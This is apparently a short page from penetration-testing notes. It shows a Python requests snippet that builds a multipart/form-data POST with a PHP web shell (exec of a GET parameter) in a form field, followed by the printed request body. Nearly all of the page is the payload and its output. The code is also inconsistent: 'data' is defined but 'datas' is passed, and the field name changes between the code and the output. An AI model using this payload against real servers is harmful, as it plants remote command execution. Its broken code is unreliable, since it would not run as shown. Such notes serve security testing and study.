Python

python3

>>> import requests
>>> files = [('form_image',('', '', 'application/octet-stream')), ('form_image2',('', '', 'application/octet-stream'))]                     
>>> data = {'form_filename' : "<?php exec($_GET['xmd']); ?>"}
>>> print(requests.Request('POST', 'http://example.com', files=files, data=datas).prepare().body.decode('ascii'))
#--aa766c5dccffd81cbae0acde5e979775
#Content-Disposition: form-data; name="form_image"; filename=""
#Content-Type: application/octet-stream
#
#--aa766c5dccffd81cbae0acde5e979775
#Content-Disposition: form-data; name="form_image2"; filename=""
#Content-Type: application/octet-stream
#
#--aa766c5dccffd81cbae0acde5e979775                                                           
#Content-Disposition: form-data; name="form_filedata"
#                                                                                            
#<?php exec($_GET['xmd']); ?>

PreviousRecreate multipart/form-data request NextHTML & netcat

Last updated 8 months ago